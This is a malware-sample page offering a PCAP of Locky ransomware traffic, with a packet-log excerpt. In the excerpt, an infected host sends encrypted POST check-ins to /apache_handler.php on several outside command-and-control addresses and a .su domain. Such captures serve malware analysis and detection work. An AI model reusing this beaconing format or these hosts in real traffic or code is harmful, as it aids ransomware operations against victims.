Text Example

Locky Ransomware Variant Malware PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 32
    Date added: May 24, 2019 12:01 am Added by: admin File size: 240 KB Downloads: 12

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
E….{@….K
.i…….P&p…n^.P…8…POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
E..(…………
.i.P…n^.&p..P…[………
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
E..4.|@…..
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
E..(…………
.i.P…n^.&p..P…X………
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E……………
.i.P…n^.&p..P…Q…HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
E..(.}@….&
.i…….P&p…na.P..D[………
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
E….~@….c
.i>……PE…}td.P….Q..POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
E..4..@….5
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E………..>…
.i.P..}td.E…P…….HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
E..(..@….@
.i>……PE…}tgnP..D……….
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
E..,……Gbh…
.i.P.$.H.M.?..`…3………
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
.ih….$.P.?…H.NP…KC……..
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
E…..@…..
.ih….$.P.?…H.NP…….POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive

Leave a Reply